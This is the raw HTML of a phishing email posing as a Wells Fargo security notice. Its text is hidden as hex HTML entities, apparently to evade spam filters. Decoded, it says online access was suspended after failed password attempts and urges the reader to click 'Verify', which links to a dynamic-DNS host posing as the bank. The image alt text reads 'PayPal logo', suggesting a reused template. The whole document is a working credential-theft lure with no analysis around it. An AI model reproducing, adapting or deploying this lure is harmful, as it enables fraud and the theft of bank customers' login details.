<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

  <title>&#x54;&#x72;&#x61;&#x6E;&#x73;&#x61;&#x63;&#x74;&#x69;&#x6F;&#x6E;&#x20;&#x56;&#x65;&#x72;&#x69;&#x66;&#x79;</title>

</head>
<body>

<center><img src="https://upload.wikimedia.org/wikipedia/commons/thumb/b/b3/Wells_Fargo_Bank.svg/768px-Wells_Fargo_Bank.svg.png" alt="PayPal logo" width="200" height="150" border="0" style="display:block" class="CToWUd"></center>
<p><b>Dear Customer,</b></p>


<p>&#x57;&#x65;&#x20;&#x72;&#x65;&#x63;&#x65;&#x6E;&#x74;&#x6C;&#x79;&#x20;&#x64;&#x65;&#x74;&#x65;&#x63;&#x74;&#x65;&#x64;&#x20;&#x66;&#x61;&#x69;&#x6C;&#x65;&#x64;&#x20;&#x61;&#x74;&#x74;&#x65;&#x6D;&#x70;&#x74;&#x73;&#x20;&#x74;&#x6F;&#x20;&#x70;&#x72;&#x6F;&#x76;&#x69;&#x64;&#x65;&#x20;&#x74;&#x68;&#x65;&#x20;&#x63;&#x6F;&#x72;&#x72;&#x65;&#x63;&#x74;&#x20;&#x61;&#x6E;&#x73;&#x77;&#x65;&#x72;&#x73;&#x20;&#x74;&#x6F;&#x20;&#x79;&#x6F;&#x75;&#x72;&#x20;&#x6F;&#x6E;&#x6C;&#x69;&#x6E;&#x65;&#x20;&#x70;&#x61;&#x73;&#x73;&#x77;&#x6F;&#x72;&#x64;.&#x20;&#x41;&#x73;&#x20;&#x61;&#x20;&#x72;&#x65;&#x73;&#x75;&#x6C;&#x74;,&#x20;&#x77;&#x65;&#x20;&#x74;&#x65;&#x6D;&#x70;&#x6F;&#x72;&#x61;&#x72;&#x69;&#x6C;&#x79;&#x20;&#x73;&#x75;&#x73;&#x70;&#x65;&#x6E;&#x64;&#x65;&#x64;&#x20;&#x6F;&#x6E;&#x6C;&#x69;&#x6E;&#x65;&#x20;&#x61;&#x63;&#x63;&#x65;&#x73;&#x73;&#x20;&#x74;&#x6F;&#x20;&#x79;&#x6F;&#x75;&#x72;&#x20;&#x61;&#x63;&#x63;&#x6F;&#x75;&#x6E;&#x74;.&#x20;&#x50;&#x6C;&#x65;&#x61;&#x73;&#x65;&#x20;&#x76;&#x65;&#x72;&#x69;&#x66;&#x79;&#x20;&#x79;&#x6F;&#x75;&#x72;&#x20;&#x61;&#x63;&#x63;&#x6F;&#x75;&#x6E;&#x74;&#x20;&#x74;&#x6F;&#x20;&#x72;&#x65;-&#x67;&#x61;&#x69;&#x6E;&#x20;&#x61;&#x63;&#x63;&#x65;&#x73;&#x73;.</p>

<center><a href="https://secure03u-myaccount.ddns.net" class="btn float-center" style=" padding: 6px 12px; font-family: 'Helvetica Neue','Helvetica',Helvetica,Arial,sans-serif; font-weight: 300; font-size: 18px; COLOR: orange; text-decoration: none; display: block; text-align: center; width: 140px; background-color: #8b0000;">&#x56;&#x65;&#x72;&#x69;&#x66;&#x79;</a></p></center><br>


<p>&#x57;&#x65;&#x6C;&#x6C;&#x73;&#x20;&#x46;&#x61;&#x72;&#x67;&#x6F;&#x20;&#x69;&#x73;&#x20;&#x64;&#x65;&#x64;&#x69;&#x63;&#x61;&#x74;&#x65;&#x64;&#x20;&#x74;&#x6F;&#x20;&#x70;&#x72;&#x6F;&#x74;&#x65;&#x63;&#x74;&#x69;&#x6E;&#x67;&#x20;&#x79;&#x6F;&#x75;&#x72;&#x20;&#x69;&#x6E;&#x66;&#x6F;&#x72;&#x6D;&#x61;&#x74;&#x69;&#x6F;&#x6E;.</p>

<p>Yours Sincerely,<br><br>Wells Fargo Online Customer Service.</p>
<br>


</body>
</html>
